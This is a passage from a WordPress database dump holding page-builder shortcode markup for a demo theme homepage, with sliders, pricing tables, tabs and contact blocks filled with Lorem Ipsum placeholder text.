animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709857066{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709867477{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506189424{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409773948538{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309a01d-cf57\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"alignleft size-full wp-image-926\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309a01d-cf57\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309a01d-cf57\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home5','','publish','closed','closed','','home5','','','2020-10-28 13:47:38','2020-10-28 13:47:38','',0,'http://veented.com/themes/north/?page_id=711',0,'page','',0),(1921,1,'2014-07-15 12:33:02','2014-07-15 12:33:02','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][vntd_fullscreen_slider images=\"542,543,544\" text_static=\"The goods you need now\" style=\"style2\" posts_nr=\"6\" bg_overlay=\"dark1\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"Welcome to North,We are Designers,We love to Design\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406483452381{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"4\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"yes\" posts_nr=\"9\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709900735{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709857066{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709867477{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506189424{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409773948538{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309a01d-cf57\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"alignleft size-full wp-image-926\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309a01d-cf57\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309a01d-cf57\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row 